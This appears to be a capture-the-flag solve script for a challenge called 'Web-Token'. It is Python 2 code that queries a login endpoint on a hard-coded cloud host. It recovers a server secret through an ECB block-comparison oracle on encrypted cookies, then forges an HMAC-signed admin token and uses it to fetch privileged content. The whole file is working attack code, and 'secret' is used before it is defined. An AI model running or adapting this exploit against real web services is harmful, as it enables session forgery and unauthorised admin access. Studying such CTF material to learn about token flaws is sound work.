solve(Web-Token).py

solve(Web-Token).py

import requests
import string
from base64 import *
from Crypto.Hash import HMAC
alpha = string.ascii_letters + string.digits

BLOCK_SIZE = 16
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)


def get_cookie(username):
	s = requests.Session()
	url = 'http://ec2-13-229-142-46.ap-southeast-1.compute.amazonaws.com:9999/login'
	name = {'name': username}
	r = s.post(url,data=name,allow_redirects=False)
	if r.status_code == 302:
		jar = r.cookies.get_dict()
		cookie = jar['token']
		token = cookie[:-32]
	return b64decode(token)
for i in range(16):
	for c in alpha:
		payload = pad(c + secret) + 'a'*(12+i)
		grep = get_cookie(payload)
		if len(secret) == 15:
			if grep[:16] == grep[-32:-16]:
				secret = c + secret
				print secret
		else:
			if grep[:16] == grep[-16:]:
				secret = c + secret
				print secret
				break


data = 'peterjson' + ":admin"
h = HMAC.new(secret.encode("utf-8"))
h.update(data.encode("utf-8"))
mac = h.hexdigest()

new_cre = b64encode(get_cookie('peterjson')) + mac

print 'FOUND new_cre: ' + new_cre

admin_cookie = dict(token=new_cre)

r = requests.get('http://ec2-13-229-142-46.ap-southeast-1.compute.amazonaws.com:9999/',cookies=admin_cookie)

print r.text